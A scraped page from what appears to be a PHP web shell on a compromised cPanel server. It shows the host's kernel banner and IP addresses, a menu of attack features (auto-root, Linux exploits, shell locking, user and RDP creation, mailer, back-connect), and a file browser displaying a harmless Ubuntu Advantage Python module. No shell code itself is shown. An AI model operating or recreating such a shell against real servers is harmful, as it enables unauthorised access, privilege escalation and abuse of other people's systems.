Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.111
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
uaclient /
jobs /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
546
B
-rw-r--r--
license_check.py
2.35
KB
-rw-r--r--
metering.py
595
B
-rw-r--r--
update_messaging.py
13.23
KB
-rw-r--r--
update_state.py
222
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
from uaclient import config, util from uaclient.clouds.identity import get_cloud_type def enable_license_check_if_applicable(cfg: config.UAConfig): series = util.get_platform_info()["series"] if "gce" in get_cloud_type() and util.is_lts(series): cfg.write_cache("marker-license-check", "") def disable_license_check_if_applicable(cfg: config.UAConfig): if cfg.cache_key_exists("marker-license-check"): cfg.delete_cache_key("marker-license-check") util.subp(["systemctl", "stop", "ua-license-check.timer"])
Close